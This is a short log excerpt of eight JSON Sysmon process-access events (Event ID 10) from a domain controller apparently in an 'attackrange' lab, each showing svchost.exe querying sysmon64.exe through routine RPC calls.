{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4986,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4987,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4988,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4989,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4990,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4991,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4992,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:00","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4993,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:00.475\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:00.475","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
